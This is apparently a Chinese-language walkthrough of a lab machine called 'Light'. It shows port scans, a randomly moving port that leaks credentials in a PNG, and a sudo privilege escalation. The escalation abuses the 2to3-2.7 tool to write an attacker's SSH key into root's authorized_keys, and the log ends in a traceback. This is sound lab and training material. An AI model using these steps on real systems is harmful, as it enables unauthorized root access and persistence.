Light
信息搜集
端口扫描
┌──(kali㉿kali)-[~/temp/Light]
└─$ rustscan -a $IP -- -sCV
.----. .-. .-. .----..---. .----. .---. .--. .-. .-.
| {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| |
| .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ |
`-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-'
The Modern Day Port Scanner.
________________________________________
: http://discord.skerritt.blog :
: https://github.com/RustScan/RustScan :
--------------------------------------
🌍HACK THE PLANET🌍
[~] The config file is expected to be at "/home/kali/.rustscan.toml"
[!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers
[!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'.
Open 192.168.10.101:22
PORT STATE SERVICE REASON VERSION
22/tcp open ssh syn-ack ttl 64 OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 93:a4:92:55:72:2b:9b:4a:52:66:5c:af:a9:83:3c:fd (RSA)
| ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQDKpc4iyFhIzxDvlJoPvgE9rRlFPOqHm4EkLgqXQkVf31csyjpvJgyZpTgr4gYV3oztsMmQbIj+nFGD+L5pQfaSXtAdxKpqt4D/MnFqVKP6KKGFhATWMCDzGXRaXQyaF7dOq49vkIoptczAU2af2PfwycA3aaI/lNPOYSHPRufkm102lE/lHZzNbXh0yJJXy9RJaqELeAibmqdrHFNpXFT8qAvsQrz/6IKJkia4JLdVbfeMdZBOQ9lIlQg+2VfKXp7pF7kGZKKttIThc8ROqlcOaxlmuC5oKEgFQP7obty1+6fx/QIuNn3D05FeQMqbvJfFZF1dE2IH4WEbFWRGH6w1
| 256 1e:a7:44:0b:2c:1b:0d:77:83:df:1d:9f:0e:30:08:4d (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBAYupwIuJVRtRMDrYZ6fR/3p5E5vsqXADwGAoZ2RW5vKPxDV3j/+QjGbnRDj1iD5/iwZxxlUggSr5raZfzAHrZA=
| 256 d0:fa:9d:76:77:42:6f:91:d3:bd:b5:44:72:a7:c9:71 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIAOshh8VG4l9hWlVYWfAvLuWuwPEdiF8EXmm5BFib/+q
58132/tcp closed unknown reset ttl 64
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel扫描一下udp:
┌──(kali㉿kali)-[~/temp/Light]
└─$ sudo nmap -sU --top-ports 100 $IP
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 01:31 EDT
Nmap scan report for 192.168.10.101
Host is up (0.00082s latency).
Not shown: 99 closed udp ports (port-unreach)
PORT STATE SERVICE
68/udp open|filtered dhcpc
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 139.07 seconds漏洞发现
敏感端口
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 58132
(UNKNOWN) [192.168.10.101] 58132 (?) : Connection refused重新扫描:
Open 192.168.10.101:22
Open 192.168.10.101:11071
Open 192.168.10.101:45691
Open 192.168.10.101:59838再扫一次:
Open 192.168.10.101:22
Open 192.168.10.101:33654。。。。。。
PORT STATE SERVICE
22/tcp open ssh
33591/tcp open unknown看一下啥情况。。。。。
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 33591
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
00000070: 0c08 7292 0491 2092 8380 08e2 09ca c1a1 ..r... .........
00000080: 2248 7aed c799 2ea7 a67a 6f7b c3ed edf2 "Hz......zo{....
00000090: 7c3f 5553 1c7d bdd3 d361 9f09 bbf7 5400 |?US.}...a....T.
000000a0: 8021 c20f 8025 c20f 8025 c20f 8025 c20f .!...%...%...%..
000000b0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000c0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000d0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000e0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
000000f0: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000100: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000110: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000120: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000130: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000140: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000150: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000160: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000170: 8025 c20f 8025 c20f 8025 c20f 8025 c20f .%...%...%...%..
00000180: 8025 c20f 8025 c20f 80a5 c50c bf07 0f23 .%...%.........#
00000190: eede 8fb8 d76e fa59 654f 82dc b7bf ff69 .....n.YeO.....i
000001a0: 0b30 538f 1fa7 f14f 63af 4d3f 976c d41c .0S....Oc.M?.l..
000001b0: cda2 5da3 f5b7 98e1 77e4 c788 67b7 45bc ..].....w...g.E.
000001c0: f855 c49b 5f47 bcba 33e2 f8e5 f697 0b4e .U.._G..3......N
000001d0: fd50 7f5e 586a 0b30 5337 ff8a 7869 47b3 .P.^Xj.0S7..xiG.
000001e0: e9e7 928d 9aa3 59b4 6bb4 fe16 ffb6 f78d ......Y.k.......
000001f0: 3d11 efec 8b38 73b5 2d58 703f 2c47 bcbd =....8s.-Xp?,G..
00000200: 37bd f952 b063 f6ee dc8b 782b 9d50 b5e9 7..R.c....x+.P..
00000210: e712 ad35 adb9 4d69 edcd d22c dad5 fadb ...5..Mi...,....
00000220: 88be 6d80 c50f 3f4d d25a e1a7 4bf8 5da7 ..m...?M.Z..K.].
00000230: 2276 9ffe 7f3b d6bb 4abc f27b c49e 54be "v...;..J..{..T.
00000240: e364 5b90 94ca 64dc fd5d 5d29 efaf 4b67 .d[...d..]])..Kg
00000250: dd2d 4722 bef8 3ee2 da6a 5b98 cce2 f826 .-G"..>..j[....&
00000260: d99f fc79 3762 e9f8 daf5 721b fbce ae5d ...y7b....r....]
00000270: 4f4a ed6a fbf2 585b a155 7b7c 35f5 2ea7 OJ.j..X[.U{|5...
00000280: e3d3 fedf dfdf 6c1a 0b1d afea 76db cd21 ......l.....v..!
00000290: f4de 3711 7b3b 7d19 b75d a9e9 ef28 edd6 ..7.{;}..]...(..
000002a0: cc87 74db fdfa 4cb3 f63e 487d ef87 5f4d ..t...L..>H}.._M
000002b0: 3f06 ada1 bfd2 4944 afd5 a69f e7c4 931d ?.....ID........
000002c0: 7eab 779a 4079 6d57 73ab 7cf8 62c4 b6a3 ~.w.@ymWs.|.b...
000002d0: 119f 1c8e b874 bdad 949c baf2 ffed 7356 .....t........sV
000002e0: 2a1b 777f cbb7 9a45 a1b2 97d3 edd4 205f *.w....E...... _
000002f0: a6c5 aa2b 8ea5 136d 416b bd8f 4f6a f7b7 ...+...mAk..Oj..
00000300: 35bd 393e 3e14 71f1 5a5b a9a5 aba4 6fce 5.9>>.q.Z[....o.
00000310: 451c bc30 bc5d f571 ade3 ebb7 ab7d e64d E..0.].q.....}.M
00000320: 6ffa acb6 bfb5 f596 6f36 f3a4 70d1 a690 o.......o6..p...
00000330: 3e54 6837 87d0 bba9 ce34 daad ed6f 6dbb >Th7.....4...om.
00000340: 5233 1fa5 e353 602a f8bb e157 db8f fe1a R3...S`*...W....
00000350: ba72 a379 eded bf23 5edf dd6c b706 3c4a .r.y...#^..l..<J
00000360: d800 4f76 f89d 4c93 a1db e2ee 44fe f04b ..Ov..L.....D..K
00000370: 7b5b d909 a1bc a8ba f54a 65a3 ee4f 0b41 {[.......Je..O.A
00000380: be4a 67c2 8f0f 467c f65d 7356 2d79 f828 .Jg...F|.]sV-y.(
00000390: 627b 5a78 1f7e 9bce c09d 052f eb75 7ce3 b{Zx.~...../.u|.
000003a0: ec4f a1b7 f940 1360 6ba9 6db7 54af d46e .O...@.`k.m.T..n
000003b0: 496d 7f6b eb89 ae4c f26d efa0 ab94 49fa Im.k...L.m....I.
000003c0: 3149 7f6b db2d 19e5 f86a d641 697f fde3 1I.k.-...j.Ai...
000003d0: fb34 adf7 9329 34bb 8f12 1486 73e2 c90e .4...)4.....s...
000003e0: bfd2 6299 76d9 f95f 07d7 fbe8 40c4 335b ..b.v.._....@.3[
000003f0: 23fe 4867 be61 f480 f9ad b498 ce2f b705 #.Hg.a......./..
00000400: 1dd3 3ee6 49ca 6aad 352e c3ca 8eff d45c ..>.I.j.5......\
00000410: 650c 6bb7 f4da da76 4bf5 446f ce61 6fd4 e.k....vK.Do.ao.
00000420: da7e d4b6 3b49 7f4b 6525 93cc c7b8 655f .~..;I.Ke%....e_
00000430: a4ab c333 3f13 7eeb 4603 ad01 d7c0 f74d ...3?.~.F......M
00000440: 7322 2597 e9ea 4c13 996f e114 5add 0f28 s"%...L..o..Z..(
00000450: 723d 9d2d 6ba9 1d6d 27d2 99b2 6f1a c73c r=.-k..m'...o..<
00000460: adb2 4174 95a4 f1c8 9b6e cd34 4ee3 b6a1 ..At.....n.4N...
00000470: 4f5a 5f49 b74f dd71 d615 7457 7e6d ed7c OZ_I.O.q..tW~m.|
00000480: 0cab 27eb 117e 35ed 8ed2 df9a f19b e67c ..'..~5........|
00000490: 8c5b 46f8 ad33 0db4 065c 03df 573b 69f9 .[F..3...\..W;i.
000004a0: 5945 b7ec 5c7b 59af 0599 e5d7 aa7c e5cf YE..\{Y......|..
000004b0: e619 d1af b79a edea 4a5b 2929 b531 8816 ........J[)).1..
000004c0: a91e 34ab 7d9d 9db5 50fa 6afb 318b b292 ..4.}...P.j.1...
000004d0: 9f6f a437 ea89 a69e c6e5 b7db 1107 cf37 .o.7...........7
000004e0: cfcd c66d 43df 37d3 986a 8cb5 bf03 697f ...mC.7..j....i.
000004f0: ba92 de7d aaad 90e4 d7d6 cec7 b07a b21e ...}.........z..
00000500: e157 d3ee 28fd 1dd6 eeb4 e7a3 b6ac ff3e .W..(..........>
00000510: fafc 48aa 97c2 efde 8366 3c79 e637 651a ..H......f<y.7e.
00000520: 684d 8226 a3ef 741a 782d bcd2 a469 22b2 hM.&..t.x-...i".
00000530: 6b69 31ea e1f6 a654 a605 a84f fdf6 a640 ki1....T...O...@
00000540: da7c b079 e09d 95f6 5752 5a18 83e8 0da6 .|.y....WRZ.....
00000550: 7675 9538 e8f6 b8b6 1fd3 a8d7 2d2b d5d3 vu.8........-+..
00000560: e2bd 9042 fa6c 3a39 647a 2654 3a79 f4f7 ...B.l:9dz&T:y..
00000570: 576a a376 acf2 c9a8 fb81 51ed 7cd4 d693 Wj.v......Q.|...
00000580: 5b69 3e34 177a b3ea 417d 496d 3f46 69b7 [i>4.z..A}Im?Fi.
00000590: afd4 dfda 766b e763 9275 90eb 95de 471a ....vk.c.u....G.
000005a0: bf5f 5288 1f4d b7f3 6753 bdd3 69d3 f1e8 ._R..M..gS..i...
000005b0: c392 3bf3 f3e5 e9c5 0cbf ffbe 85de 0ea2 ..;.............
000005c0: 0655 97f4 ba5d d487 06dd 6fa6 eb3b 4b0a .U...]....o..;K.
000005d0: b07c fba9 dfab 9ece 80ba 05e8 d2a4 e843 .|.............C
000005e0: 092d 7a4d b43e 98d8 77ae fd65 abbf bffc .-zM.>..w..e....
000005f0: d725 fab7 abb4 804a 1e3d 8eb8 beda f441 .%.....J.=.....A
00000600: 6daf 0e78 b3d5 f663 d27a 1ac7 ee31 97ea m..x...c.z...1..
00000610: 1dbd d4fc 5f63 94d5 eeaf f6cd 9be7 37ff ...._c........7.
00000620: 054f 6d3f 06cd 476d 3dd1 1c68 2e34 27d7 .Om?..Gm=..h.4'.
00000630: d315 d3fd 74d5 a27a dd75 55db 8fda 766b ....t..z.uU...vk
00000640: fb3b 6ebb a3cc ef28 f54a efa3 fc81 913e .;n....(.J.....>
00000650: f155 5f14 ba7a 5d77 7f73 6231 c34f 6790 .U_..z]w.sb1.Og.
00000660: fc17 1e1a 586d 1a6c fdff e92d 6da5 9626 ....Xm.l...-m..&
00000670: 43cf 57f4 3b6d fa74 4acf 2206 797e a9b9 C.W.;m.tJ.".y~..
00000680: d5d5 d9ae a4bf bfe7 b637 0ba3 4b0f b0b5 .........7..K...
00000690: 0fed 6b2d fafa 80ce 9c35 0ba3 dbae ae14 ..k-.....5......
000006a0: 153e 3b3a b744 596d 7ffb f534 7e1a c7fe .>;:.DYm...4~...
000006b0: 314f 737f a571 2995 75e7 77d4 764b f321 1Os..q).u.w.vK.!
000006c0: b5f5 321d 8fae ba72 fdee baaa ed87 d4b4 ..2....r........
000006d0: 5bdb df49 daad 9ddf 49d7 c14a ba33 503d [..I....I..J.3P=
000006e0: 6d7f dc6d 6e85 4bc7 3707 16ff b677 91e9 m..mn.K.7....w..
000006f0: eca9 f0d3 4219 c5ce 147a ba32 292d 3e00 ....B....z.2)->.
00000700: 5508 bf8d a46f e1eb 01b7 9e33 d6d2 37eb U....o.....3..7.
00000710: f525 d4fd e996 7c8e 1e1e 038b 86f0 9b77 .%....|........w
00000720: fae4 4e9f 025f b8d6 7c63 5eb7 10fa d6bf ..N.._..|c^.....
00000730: 9e15 0218 1be1 37ef f477 927a a8ac bfaa ......7..w.z....
00000740: d0a6 af3f ccd1 2766 c0a2 22fc 0058 22fc ...?..'f.."..X".
00000750: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000760: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000770: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000780: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000790: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007a0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007b0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007c0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007d0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007e0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
000007f0: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000800: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000810: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000820: 0058 22fc 0058 22fc 0058 22fc 0058 22fc .X"..X"..X"..X".
00000830: 0018 8af8 1765 703a 66dc e967 bc00 0000 .....ep:f..g....
00000840: 0049 454e 44ae 4260 82 .IEND.B`.有一个.png文件。。。。。尝试下载的时候:
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 33591 > temp.png
(UNKNOWN) [192.168.10.101] 33591 (?) : Connection refused又变了呗。。。。
┌──(kali㉿kali)-[~/temp/Light]
└─$ nmap $IP -p 1-65535
Starting Nmap 7.95 ( https://nmap.org ) at 2025-06-27 01:48 EDT
Nmap scan report for 192.168.10.101
Host is up (0.00047s latency).
Not shown: 65533 closed tcp ports (reset)
PORT STATE SERVICE
22/tcp open ssh
12493/tcp open unknown
MAC Address: 08:00:27:07:5C:9B (PCS Systemtechnik/Oracle VirtualBox virtual NIC)
Nmap done: 1 IP address (1 host up) scanned in 5.62 seconds
┌──(kali㉿kali)-[~/temp/Light]
└─$ nc $IP 12493 > temp.png
拿到凭证lover:youcanseetheshadow:
提权
信息搜集
lover@light:~$ sudo -l
Matching Defaults entries for lover on light:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin
User lover may run the following commands on light:
(ALL : ALL) NOPASSWD: /usr/bin/2to3-2.7
lover@light:~$ ls -la /usr/bin/2to3-2.7
-rwxr-xr-x 1 root root 96 Oct 10 2019 /usr/bin/2to3-2.7
lover@light:~$ file /usr/bin/2to3-2.7
/usr/bin/2to3-2.7: a /usr/bin/python2.7 script, ASCII text executable
lover@light:~$ cat /usr/bin/2to3-2.7
#! /usr/bin/python2.7
import sys
from lib2to3.main import main
sys.exit(main("lib2to3.fixes"))
lover@light:~$ find / -name "*lib2to3.main*" 2>/dev/null
lover@light:~$ find / -name "*lib2to3*" 2>/dev/null
/usr/lib/python2.7/lib2to3
lover@light:~$ ls -la /usr/lib/python2.7/lib2to3
total 304
drwxr-xr-x 4 root root 4096 Nov 13 2020 .
drwxr-xr-x 26 root root 16384 Nov 13 2020 ..
-rw-r--r-- 1 root root 6834 Oct 10 2019 btm_matcher.py
-rw-r--r-- 1 root root 5808 Nov 13 2020 btm_matcher.pyc
-rw-r--r-- 1 root root 10012 Oct 10 2019 btm_utils.py
-rw-r--r-- 1 root root 7537 Nov 13 2020 btm_utils.pyc
-rw-r--r-- 1 root root 6780 Oct 10 2019 fixer_base.py
-rw-r--r-- 1 root root 7154 Nov 13 2020 fixer_base.pyc
-rw-r--r-- 1 root root 14597 Oct 10 2019 fixer_util.py
-rw-r--r-- 1 root root 14615 Nov 13 2020 fixer_util.pyc
drwxr-xr-x 2 root root 4096 Nov 13 2020 fixes
-rw-r--r-- 1 root root 7094 Oct 10 2019 Grammar.txt
-rw-r--r-- 1 root root 7 Oct 10 2019 __init__.py
-rw-r--r-- 1 root root 125 Nov 13 2020 __init__.pyc
-rw-r--r-- 1 root root 67 Oct 10 2019 __main__.py
-rw-r--r-- 1 root root 11605 Oct 10 2019 main.py
-rw-r--r-- 1 root root 240 Nov 13 2020 __main__.pyc
-rw-r--r-- 1 root root 9811 Nov 13 2020 main.pyc
-rw-r--r-- 1 root root 7065 Oct 10 2019 patcomp.py
-rw-r--r-- 1 root root 6577 Nov 13 2020 patcomp.pyc
-rw-r--r-- 1 root root 793 Oct 10 2019 PatternGrammar.txt
drwxr-xr-x 2 root root 4096 Nov 13 2020 pgen2
-rw-r--r-- 1 root root 1158 Oct 10 2019 pygram.py
-rw-r--r-- 1 root root 1435 Nov 13 2020 pygram.pyc
-rw-r--r-- 1 root root 29039 Oct 10 2019 pytree.py
-rw-r--r-- 1 root root 30151 Nov 13 2020 pytree.pyc
-rw-r--r-- 1 root root 28067 Oct 10 2019 refactor.py
-rw-r--r-- 1 root root 23874 Nov 13 2020 refactor.pyc
lover@light:~$ /usr/bin/2to3-2.7 --help
Usage: 2to3 [options] file|dir ...
Options:
-h, --help show this help message and exit
-d, --doctests_only Fix up doctests only
-f FIX, --fix=FIX Each FIX specifies a transformation; default: all
-j PROCESSES, --processes=PROCESSES
Run 2to3 concurrently
-x NOFIX, --nofix=NOFIX
Prevent a transformation from being run
-l, --list-fixes List available transformations
-p, --print-function Modify the grammar so that print() is a function
-v, --verbose More verbose logging
--no-diffs Don't show diffs of the refactoring
-w, --write Write back modified files
-n, --nobackups Don't write backups for modified files
-o OUTPUT_DIR, --output-dir=OUTPUT_DIR
Put output files in this directory instead of
overwriting the input files. Requires -n.
-W, --write-unchanged-files
Also write files even if no changes were required
(useful with --output-dir); implies -w.
--add-suffix=ADD_SUFFIX
Append this string to all output filenames. Requires
-n if non-empty. ex: --add-suffix='3' will generate
.py3 files.
lover@light:~$ ls -la
total 52
drwxr-xr-x 3 lover lover 4096 Nov 13 2020 .
drwxr-xr-x 3 root root 4096 Nov 13 2020 ..
-rw-r--r-- 1 lover lover 220 Nov 13 2020 .bash_logout
-rw-r--r-- 1 lover lover 3526 Nov 13 2020 .bashrc
-rwxr-xr-x 1 lover lover 1921 Nov 13 2020 flag.sh
drwxr-xr-x 3 lover lover 4096 Nov 13 2020 .local
-rw-r--r-- 1 lover lover 9037 Nov 13 2020 mypass.txt
-rw-r--r-- 1 lover lover 807 Nov 13 2020 .profile
-rwxr-xr-x 1 lover lover 660 Nov 13 2020 tip.py
-rw------- 1 lover lover 17 Nov 13 2020 user.txt
-rw------- 1 lover lover 51 Nov 13 2020 .Xauthority
lover@light:~$ cat flag.sh
#!/bin/bash
echo '\033[0;35m
. **
* *.
,*
*,
, ,*
., *,
/ *
,* *,
/. .*.
* **
,* ,*
** *.
** **.
,* **
*, ,*
* **
*, .*
*. **
** ,*,
** *, \033[0m'
echo "-------------------------"
echo "\nPWNED HOST: $(hostname)"
echo "\nPWNED DATE: $(date)"
echo "\nWHOAMI: $(id)"
echo "\nFLAG: $(cat root.txt 2>/dev/null || cat user.txt 2>/dev/null || echo "Keep trying.")"
echo "\n------------------------"
lover@light:~$ cat tip.py
#!/usr/bin/env python3
import socket
from random import randint
HOST = '0.0.0.0' # Symbolic name meaning all available interfaces
while True:
allow_reuse_address = True
random = randint(8000,65000)
PORT = random # Arbitrary non-privileged port
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
s.bind((HOST, PORT))
s.listen(1)
conn, addr = s.accept()
print ("Connected by",addr)
with open('mypass.txt', 'r') as f:
conn.sendall(f.read().encode('utf-8'))
conn.close()
lover@light:~$ cat mypass.txt
00000000: 8950 4e47 0d0a 1a0a 0000 000d 4948 4452 .PNG........IHDR
00000010: 0000 013f 0000 0085 0806 0000 002d 80ff ...?.........-..
00000020: 0c00 0000 0173 5247 4200 aece 1ce9 0000 .....sRGB.......
00000030: 0004 6741 4d41 0000 b18f 0bfc 6105 0000 ..gAMA......a...
00000040: 0009 7048 5973 0000 0ec3 0000 0ec3 01c7 ..pHYs..........
00000050: 6fa8 6400 0007 de49 4441 5478 5eed dbf7 o.d....IDATx^...
00000060: 9314 4518 c671 ffff 1f2d ab2c 73c0 9cb0 ..E..q...-.,s...
----------------
lover@light:~$ cat /etc/cron*
cat: /etc/cron.d: Is a directory
cat: /etc/cron.daily: Is a directory
cat: /etc/cron.hourly: Is a directory
cat: /etc/cron.monthly: Is a directory
# /etc/crontab: system-wide crontab
# Unlike any other crontab you don't have to run the `crontab'
# command to install the new version when you edit this file
# and files in /etc/cron.d. These files also have username fields,
# that none of the other crontabs do.
SHELL=/bin/sh
PATH=/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin
# Example of job definition:
# .---------------- minute (0 - 59)
# | .------------- hour (0 - 23)
# | | .---------- day of month (1 - 31)
# | | | .------- month (1 - 12) OR jan,feb,mar,apr ...
# | | | | .---- day of week (0 - 6) (Sunday=0 or 7) OR sun,mon,tue,wed,thu,fri,sat
# | | | | |
# * * * * * user-name command to be executed
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
cat: /etc/cron.weekly: Is a directory
lover@light:~$ crontab -l
# Edit this file to introduce tasks to be run by cron.
#
# Each task to run has to be defined through a single line
# indicating with different fields when the task will be run
# and what command to run for the task
#
# To define the time you can provide concrete values for
# minute (m), hour (h), day of month (dom), month (mon),
# and day of week (dow) or use '*' in these fields (for 'any').
#
# Notice that tasks will be started based on the cron's system
# daemon's notion of time and timezones.
#
# Output of the crontab jobs (including errors) is sent through
# email to the user the crontab file belongs to (unless redirected).
#
# For example, you can run a backup of all your user accounts
# at 5 a.m every week with:
# 0 5 * * 1 tar -zcf /var/backups/home.tgz /home/
#
# For more information see the manual pages of crontab(5) and cron(8)
#
# m h dom mon dow command
@reboot python /home/lover/tip.py覆写公钥
似乎是一个将 python2 程序转换成 python3 程序的库,拥有写入权限,尝试写入替换公钥:
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
print text然后尝试强行写入:
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/authorized_keys
lib2to3.main: Output in '/root/.ssh/authorized_keys' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys/authorized_keys.
RefactoringTool: Files that were modified:
RefactoringTool: authorized_keys尝试连接一下,但是失败了。。。。是我使用方法有问题,它是写入了一个名为authorized_keys目录。。。。
lover@light:/tmp$ sudo /usr/bin/2to3-2.7 -w -n authorized_keys -o /root/.ssh/
lib2to3.main: Output in '/root/.ssh/' will mirror the input directory '' layout.
RefactoringTool: Skipping optional fixer: buffer
RefactoringTool: Skipping optional fixer: idioms
RefactoringTool: Skipping optional fixer: set_literal
RefactoringTool: Skipping optional fixer: ws_comma
RefactoringTool: Refactored authorized_keys
--- authorized_keys (original)
+++ authorized_keys (refactored)
@@ -1,4 +1,4 @@
text = '''
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCX4CxFTzX3/H4eZNPPElW0lQUQaQkaM+CPykvpX1WA6DKHCxaFCkN22uR/+o0COklnUr0DcJjfOwJa+FdG4XD2sbZ7HLlf5/5QCapABB5ImRKm3S8nnkB5N08DFiflK4ua9KRnRFb1+M9rgbXLyGu0RErtCla6cY2hpe9ue+Iwj4FrT1gtnLfhVTTWYK6X+q4p/UIRTukE1465+d7MacxEPpmvh9S12b/mmL50LmrRLNSGC94KoqpMFmh4S04AxjdicMUJvnw6GSeORztY1MErdlUm4ZbAleFFQlZqVod+dTNe7jXpHZTw9S42koS2Ydso+XcXI48/T/7N796aw8PVrveOzB8Yj92iJa/N1dmvnWBPuZnrqTDNAsUbcRhU48fF+v0HvOseXGVuYxpu1C+kCOcy6P9xPDL7MnJ8TM0yPEW8M1rFt6bMZuPkVadYJHWhRBz1ThZBonjG7OOcE//P426gFbjRe66qFw2eKJeg2Qihtx89UgZNDRWOtDC20VM= kali@kali
'''
-print text
+print(text)
RefactoringTool: Writing converted authorized_keys to /root/.ssh/authorized_keys.
Traceback (most recent call last):
File "/usr/bin/2to3-2.7", line 5, in <module>
sys.exit(main("lib2to3.fixes"))
File "/usr/lib/python2.7/lib2to3/main.py", line 260, in main
options.processes)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 706, in refactor
items, write, doctests_only)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 301, in refactor
self.refactor_file(dir_or_file, write, doctests_only)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 747, in refactor_file
*args, **kwargs)
File "/usr/lib/python2.7/lib2to3/refactor.py", line 358, in refactor_file
write=write, encoding=encoding)
